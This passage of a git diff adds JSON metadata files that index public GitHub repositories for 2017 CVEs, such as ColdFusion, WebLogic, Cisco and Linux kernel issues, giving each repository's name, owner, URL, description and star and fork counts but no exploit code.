"https:\/\/avatars.githubusercontent.com\/u\/8680262?v=4", + "html_url": "https:\/\/github.com\/codewhitesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/codewhitesec\/ColdFusionPwn", + "description": "Exploitation Tool for CVE-2017-3066 targeting Adobe Coldfusion 11\/12", + "fork": false, + "created_at": "2018-03-12T16:44:12Z", + "updated_at": "2024-11-14T00:10:16Z", + "pushed_at": "2022-10-18T08:53:13Z", + "stargazers_count": 95, + "watchers_count": 95, + "has_discussions": false, + "forks_count": 33, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 33, + "watchers": 95, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 213896984, + "name": "CVE-2017-3066", + "full_name": "cucadili\/CVE-2017-3066", + "owner": { + "login": "cucadili", + "id": 48569185, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48569185?v=4", + "html_url": "https:\/\/github.com\/cucadili", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cucadili\/CVE-2017-3066", + "description": "The study of vulnerability CVE-2017-3066. Java deserialization", + "fork": false, + "created_at": "2019-10-09T11:13:00Z", + "updated_at": "2020-12-07T10:28:53Z", + "pushed_at": "2019-10-09T12:19:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-3078.json b/2017/CVE-2017-3078.json new file mode 100644 index 0000000000..bfc8c8a11c --- /dev/null +++ b/2017/CVE-2017-3078.json @@ -0,0 +1,33 @@ +[ + { + "id": 95431299, + "name": "CVE-2017-3078", + "full_name": "homjxi0e\/CVE-2017-3078", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-3078", + "description": null, + "fork": false, + "created_at": "2017-06-26T09:34:59Z", + "updated_at": "2017-06-26T09:34:59Z", + "pushed_at": "2017-06-26T09:49:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-3143.json b/2017/CVE-2017-3143.json new file mode 100644 index 0000000000..307c068b4e --- /dev/null +++ b/2017/CVE-2017-3143.json @@ -0,0 +1,33 @@ +[ + { + "id": 196239476, + "name": "CVE-2017-3143", + "full_name": "saaph\/CVE-2017-3143", + "owner": { + "login": "saaph", + "id": 27734694, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27734694?v=4", + "html_url": "https:\/\/github.com\/saaph", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saaph\/CVE-2017-3143", + "description": "Exploit for TSIG bypass vulnerabilities in Bind (CVE-2017-3143) and Knot DNS (CVE-2017-11104)", + "fork": false, + "created_at": "2019-07-10T16:25:15Z", + "updated_at": "2023-03-30T12:57:02Z", + "pushed_at": "2019-07-10T16:31:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-3164.json b/2017/CVE-2017-3164.json new file mode 100644 index 0000000000..a53a85e4e9 --- /dev/null +++ b/2017/CVE-2017-3164.json @@ -0,0 +1,33 @@ +[ + { + "id": 677536995, + "name": "PoC_CVE-2017-3164_CVE-2017-1262", + "full_name": "tdwyer\/PoC_CVE-2017-3164_CVE-2017-1262", + "owner": { + "login": "tdwyer", + "id": 3000070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3000070?v=4", + "html_url": "https:\/\/github.com\/tdwyer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tdwyer\/PoC_CVE-2017-3164_CVE-2017-1262", + "description": "Apache Solr Poc CVE-2017-3164 CVE-2017-12629", + "fork": false, + "created_at": "2023-08-11T20:48:31Z", + "updated_at": "2023-08-22T18:37:28Z", + "pushed_at": "2023-08-11T21:03:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-3241.json b/2017/CVE-2017-3241.json new file mode 100644 index 0000000000..9069be693a --- /dev/null +++ b/2017/CVE-2017-3241.json @@ -0,0 +1,64 @@ +[ + { + "id": 96219146, + "name": "CVE-2017-3241-POC", + "full_name": "xfei3\/CVE-2017-3241-POC", + "owner": { + "login": "xfei3", + "id": 29874084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29874084?v=4", + "html_url": "https:\/\/github.com\/xfei3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xfei3\/CVE-2017-3241-POC", + "description": "POC for java RMI deserialization vulnerability", + "fork": false, + "created_at": "2017-07-04T13:05:46Z", + "updated_at": "2020-03-29T07:05:46Z", + "pushed_at": "2017-07-19T23:55:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 419955901, + "name": "CVE-2017-3241", + "full_name": "scopion\/CVE-2017-3241", + "owner": { + "login": "scopion", + "id": 27413591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27413591?v=4", + "html_url": "https:\/\/github.com\/scopion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scopion\/CVE-2017-3241", + "description": null, + "fork": false, + "created_at": "2021-10-22T03:39:01Z", + "updated_at": "2021-10-22T03:40:45Z", + "pushed_at": "2021-10-22T03:40:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-3248.json b/2017/CVE-2017-3248.json new file mode 100644 index 0000000000..302425ae53 --- /dev/null +++ b/2017/CVE-2017-3248.json @@ -0,0 +1,116 @@ +[ + { + "id": 219758496, + "name": "CVE-2017-3248", + "full_name": "ianxtianxt\/CVE-2017-3248", + "owner": { + "login": "ianxtianxt", + "id": 45796484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45796484?v=4", + "html_url": "https:\/\/github.com\/ianxtianxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianxtianxt\/CVE-2017-3248", + "description": "CVE-2017-3248", + "fork": false, + "created_at": "2019-11-05T13:59:31Z", + "updated_at": "2024-08-12T19:54:34Z", + "pushed_at": "2019-11-05T14:00:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 233997916, + "name": "weblogicScanner", + "full_name": "0xn0ne\/weblogicScanner", + "owner": { + "login": "0xn0ne", + "id": 16507416, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16507416?v=4", + "html_url": "https:\/\/github.com\/0xn0ne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xn0ne\/weblogicScanner", + "description": "weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14750、CVE-2020-14882、CVE-2020-14883", + "fork": false, + "created_at": "2020-01-15T04:26:29Z", + "updated_at": "2024-11-28T15:07:29Z", + "pushed_at": "2023-11-24T09:21:56Z", + "stargazers_count": 2014, + "watchers_count": 2014, + "has_discussions": true, + "forks_count": 339, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2016-0638", + "cve-2016-3510", + "cve-2017-10271", + "cve-2017-3248", + "cve-2018-2893", + "cve-2018-2894", + "cve-2018-3191", + "cve-2018-3245", + "cve-2018-3252", + "cve-2019-2618", + "cve-2019-2725", + "cve-2019-2729", + "cve-2019-2888", + "cve-2019-2890", + "cve-2020-14750", + "cve-2020-14882", + "cve-2020-14883", + "cve-2020-2551", + "cve-2020-2555", + "cve-2020-2883" + ], + "visibility": "public", + "forks": 339, + "watchers": 2014, + "score": 0, + "subscribers_count": 37 + }, + { + "id": 400940873, + "name": "CVE-2017-3248", + "full_name": "BabyTeam1024\/CVE-2017-3248", + "owner": { + "login": "BabyTeam1024", + "id": 74447452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74447452?v=4", + "html_url": "https:\/\/github.com\/BabyTeam1024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BabyTeam1024\/CVE-2017-3248", + "description": null, + "fork": false, + "created_at": "2021-08-29T03:24:25Z", + "updated_at": "2024-08-12T20:15:59Z", + "pushed_at": "2021-09-03T07:37:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-3506.json b/2017/CVE-2017-3506.json new file mode 100644 index 0000000000..8bcdc016d7 --- /dev/null +++ b/2017/CVE-2017-3506.json @@ -0,0 +1,67 @@ +[ + { + "id": 219761355, + "name": "CVE-2017-3506", + "full_name": "ianxtianxt\/CVE-2017-3506", + "owner": { + "login": "ianxtianxt", + "id": 45796484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45796484?v=4", + "html_url": "https:\/\/github.com\/ianxtianxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianxtianxt\/CVE-2017-3506", + "description": "CVE-2017-3506", + "fork": false, + "created_at": "2019-11-05T14:11:56Z", + "updated_at": "2024-08-12T19:54:34Z", + "pushed_at": "2019-11-05T14:12:12Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 313793453, + "name": "CVE-2017-3506", + "full_name": "Al1ex\/CVE-2017-3506", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2017-3506", + "description": "CVE-2017-3506", + "fork": false, + "created_at": "2020-11-18T01:50:47Z", + "updated_at": "2024-08-12T20:07:44Z", + "pushed_at": "2020-11-18T01:52:26Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-3506", + "weblogic" + ], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-3599.json b/2017/CVE-2017-3599.json new file mode 100644 index 0000000000..ae40f1a9b8 --- /dev/null +++ b/2017/CVE-2017-3599.json @@ -0,0 +1,66 @@ +[ + { + "id": 88650555, + "name": "CVE-2017-3599", + "full_name": "SECFORCE\/CVE-2017-3599", + "owner": { + "login": "SECFORCE", + "id": 8157384, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8157384?v=4", + "html_url": "https:\/\/github.com\/SECFORCE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SECFORCE\/CVE-2017-3599", + "description": "Proof of concept exploit for CVE-2017-3599", + "fork": false, + "created_at": "2017-04-18T17:08:39Z", + "updated_at": "2024-08-27T11:03:28Z", + "pushed_at": "2017-04-18T17:10:18Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-3599" + ], + "visibility": "public", + "forks": 20, + "watchers": 23, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 396745831, + "name": "mysql_dos", + "full_name": "jptr218\/mysql_dos", + "owner": { + "login": "jptr218", + "id": 84092766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84092766?v=4", + "html_url": "https:\/\/github.com\/jptr218", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jptr218\/mysql_dos", + "description": "A tool to crash MySQL servers with CVE-2017-3599", + "fork": false, + "created_at": "2021-08-16T10:39:44Z", + "updated_at": "2021-08-16T10:43:21Z", + "pushed_at": "2021-08-16T10:43:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-3730.json b/2017/CVE-2017-3730.json new file mode 100644 index 0000000000..fd18e11dab --- /dev/null +++ b/2017/CVE-2017-3730.json @@ -0,0 +1,33 @@ +[ + { + "id": 80442312, + "name": "CVE-2017-3730", + "full_name": "olivierh59500\/CVE-2017-3730", + "owner": { + "login": "olivierh59500", + "id": 3375676, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3375676?v=4", + "html_url": "https:\/\/github.com\/olivierh59500", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/olivierh59500\/CVE-2017-3730", + "description": "OpenSSL CVE-2017-3730 proof-of-concept", + "fork": false, + "created_at": "2017-01-30T17:00:17Z", + "updated_at": "2017-01-30T17:00:18Z", + "pushed_at": "2017-01-26T01:30:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-3881.json b/2017/CVE-2017-3881.json new file mode 100644 index 0000000000..8953dd2a8a --- /dev/null +++ b/2017/CVE-2017-3881.json @@ -0,0 +1,157 @@ +[ + { + "id": 87763747, + "name": "cisco-rce", + "full_name": "artkond\/cisco-rce", + "owner": { + "login": "artkond", + "id": 4436674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4436674?v=4", + "html_url": "https:\/\/github.com\/artkond", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/artkond\/cisco-rce", + "description": "CVE-2017-3881 Cisco Catalyst Remote Code Execution PoC", + "fork": false, + "created_at": "2017-04-10T03:44:04Z", + "updated_at": "2024-10-22T07:49:31Z", + "pushed_at": "2017-04-12T09:17:27Z", + "stargazers_count": 206, + "watchers_count": 206, + "has_discussions": false, + "forks_count": 80, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 80, + "watchers": 206, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 88804675, + "name": "CVE-2017-3881-exploit-cisco-", + "full_name": "homjxi0e\/CVE-2017-3881-exploit-cisco-", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-3881-exploit-cisco-", + "description": null, + "fork": false, + "created_at": "2017-04-20T00:52:10Z", + "updated_at": "2024-08-12T19:29:14Z", + "pushed_at": "2017-04-20T00:52:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 90087111, + "name": "CVE-2017-3881-Cisco", + "full_name": "homjxi0e\/CVE-2017-3881-Cisco", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-3881-Cisco", + "description": null, + "fork": false, + "created_at": "2017-05-02T23:21:53Z", + "updated_at": "2017-05-02T23:28:05Z", + "pushed_at": "2017-05-02T23:28:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 90975256, + "name": "PoC-CVE-2017-3881", + "full_name": "mzakyz666\/PoC-CVE-2017-3881", + "owner": { + "login": "mzakyz666", + "id": 22362343, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22362343?v=4", + "html_url": "https:\/\/github.com\/mzakyz666", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mzakyz666\/PoC-CVE-2017-3881", + "description": "Cisco Catalyst Remote Code Execution PoC", + "fork": false, + "created_at": "2017-05-11T12:11:51Z", + "updated_at": "2021-03-05T02:06:43Z", + "pushed_at": "2017-05-11T13:52:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 115962692, + "name": "CVE-2017-3881", + "full_name": "1337g\/CVE-2017-3881", + "owner": { + "login": "1337g", + "id": 32504404, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32504404?v=4", + "html_url": "https:\/\/github.com\/1337g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1337g\/CVE-2017-3881", + "description": "credit to artkond", + "fork": false, + "created_at": "2018-01-02T01:45:15Z", + "updated_at": "2022-04-11T12:16:38Z", + "pushed_at": "2018-01-02T01:46:19Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-4490.json b/2017/CVE-2017-4490.json new file mode 100644 index 0000000000..0b7a5d476e --- /dev/null +++ b/2017/CVE-2017-4490.json @@ -0,0 +1,64 @@ +[ + { + "id": 89991237, + "name": "CVE-2017-4490-", + "full_name": "homjxi0e\/CVE-2017-4490-", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-4490-", + "description": null, + "fork": false, + "created_at": "2017-05-02T04:21:46Z", + "updated_at": "2017-08-23T09:25:02Z", + "pushed_at": "2017-07-10T23:37:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 96573883, + "name": "CVE-2017-4490-install-Script-Python-in-Terminal-", + "full_name": "homjxi0e\/CVE-2017-4490-install-Script-Python-in-Terminal-", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-4490-install-Script-Python-in-Terminal-", + "description": null, + "fork": false, + "created_at": "2017-07-07T20:21:51Z", + "updated_at": "2017-08-23T09:24:55Z", + "pushed_at": "2017-07-11T15:36:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-4878.json b/2017/CVE-2017-4878.json new file mode 100644 index 0000000000..7c6446a05a --- /dev/null +++ b/2017/CVE-2017-4878.json @@ -0,0 +1,33 @@ +[ + { + "id": 120257153, + "name": "CVE-2017-4878-Samples", + "full_name": "brianwrf\/CVE-2017-4878-Samples", + "owner": { + "login": "brianwrf", + "id": 8141813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8141813?v=4", + "html_url": "https:\/\/github.com\/brianwrf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brianwrf\/CVE-2017-4878-Samples", + "description": "CVE-2017-4878 Samples - http:\/\/blog.talosintelligence.com\/2018\/02\/group-123-goes-wild.html", + "fork": false, + "created_at": "2018-02-05T05:01:40Z", + "updated_at": "2024-08-12T19:36:02Z", + "pushed_at": "2018-02-05T05:17:41Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 18, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-4971.json b/2017/CVE-2017-4971.json new file mode 100644 index 0000000000..c72bee4381 --- /dev/null +++ b/2017/CVE-2017-4971.json @@ -0,0 +1,33 @@ +[ + { + "id": 166267853, + "name": "cve-2017-4971", + "full_name": "cved-sources\/cve-2017-4971", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2017-4971", + "description": "cve-2017-4971", + "fork": false, + "created_at": "2019-01-17T17:31:59Z", + "updated_at": "2021-04-15T21:25:27Z", + "pushed_at": "2021-04-15T21:25:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5005.json b/2017/CVE-2017-5005.json new file mode 100644 index 0000000000..e366e55b8b --- /dev/null +++ b/2017/CVE-2017-5005.json @@ -0,0 +1,33 @@ +[ + { + "id": 77828551, + "name": "QuickHeal", + "full_name": "payatu\/QuickHeal", + "owner": { + "login": "payatu", + "id": 16715624, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16715624?v=4", + "html_url": "https:\/\/github.com\/payatu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/payatu\/QuickHeal", + "description": "CVE-2017-5005 for Quick Heal Antivirus", + "fork": false, + "created_at": "2017-01-02T11:21:00Z", + "updated_at": "2024-08-12T19:26:54Z", + "pushed_at": "2017-03-31T14:49:28Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 15, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5007.json b/2017/CVE-2017-5007.json new file mode 100644 index 0000000000..a0bdcc94c0 --- /dev/null +++ b/2017/CVE-2017-5007.json @@ -0,0 +1,33 @@ +[ + { + "id": 159156980, + "name": "CVE-2017-5007", + "full_name": "Ang-YC\/CVE-2017-5007", + "owner": { + "login": "Ang-YC", + "id": 21954291, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21954291?v=4", + "html_url": "https:\/\/github.com\/Ang-YC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ang-YC\/CVE-2017-5007", + "description": null, + "fork": false, + "created_at": "2018-11-26T11:14:13Z", + "updated_at": "2018-11-26T11:19:23Z", + "pushed_at": "2018-11-26T11:19:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5123.json b/2017/CVE-2017-5123.json new file mode 100644 index 0000000000..c948354f17 --- /dev/null +++ b/2017/CVE-2017-5123.json @@ -0,0 +1,193 @@ +[ + { + "id": 108940978, + "name": "CVE-2017-5123", + "full_name": "FloatingGuy\/CVE-2017-5123", + "owner": { + "login": "FloatingGuy", + "id": 6472909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6472909?v=4", + "html_url": "https:\/\/github.com\/FloatingGuy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FloatingGuy\/CVE-2017-5123", + "description": "linux kernel exploit ", + "fork": false, + "created_at": "2017-10-31T03:35:31Z", + "updated_at": "2017-12-31T09:13:28Z", + "pushed_at": "2017-10-31T03:39:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 109344615, + "name": "CVE-2017-5123", + "full_name": "0x5068656e6f6c\/CVE-2017-5123", + "owner": { + "login": "0x5068656e6f6c", + "id": 22329435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22329435?v=4", + "html_url": "https:\/\/github.com\/0x5068656e6f6c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x5068656e6f6c\/CVE-2017-5123", + "description": "Exploit for the linux kernel vulnerability CVE-2017-5123", + "fork": false, + "created_at": "2017-11-03T02:52:26Z", + "updated_at": "2018-10-20T20:12:24Z", + "pushed_at": "2017-11-03T02:58:39Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 123423508, + "name": "exploiting-cve-2017-5123", + "full_name": "Synacktiv-contrib\/exploiting-cve-2017-5123", + "owner": { + "login": "Synacktiv-contrib", + "id": 28860793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28860793?v=4", + "html_url": "https:\/\/github.com\/Synacktiv-contrib", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Synacktiv-contrib\/exploiting-cve-2017-5123", + "description": "Source code and configuration files related to our article in MISC96", + "fork": false, + "created_at": "2018-03-01T11:03:08Z", + "updated_at": "2023-10-13T14:17:46Z", + "pushed_at": "2018-03-01T12:55:59Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 136574054, + "name": "CVE-2017-5123", + "full_name": "teawater\/CVE-2017-5123", + "owner": { + "login": "teawater", + "id": 432382, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/432382?v=4", + "html_url": "https:\/\/github.com\/teawater", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/teawater\/CVE-2017-5123", + "description": null, + "fork": false, + "created_at": "2018-06-08T06:07:01Z", + "updated_at": "2018-12-24T01:41:56Z", + "pushed_at": "2018-12-24T01:41:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 262355402, + "name": "CVE-2017-5123", + "full_name": "c3r34lk1ll3r\/CVE-2017-5123", + "owner": { + "login": "c3r34lk1ll3r", + "id": 12492834, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12492834?v=4", + "html_url": "https:\/\/github.com\/c3r34lk1ll3r", + "user_view_type": "public" + }, + "html_url": 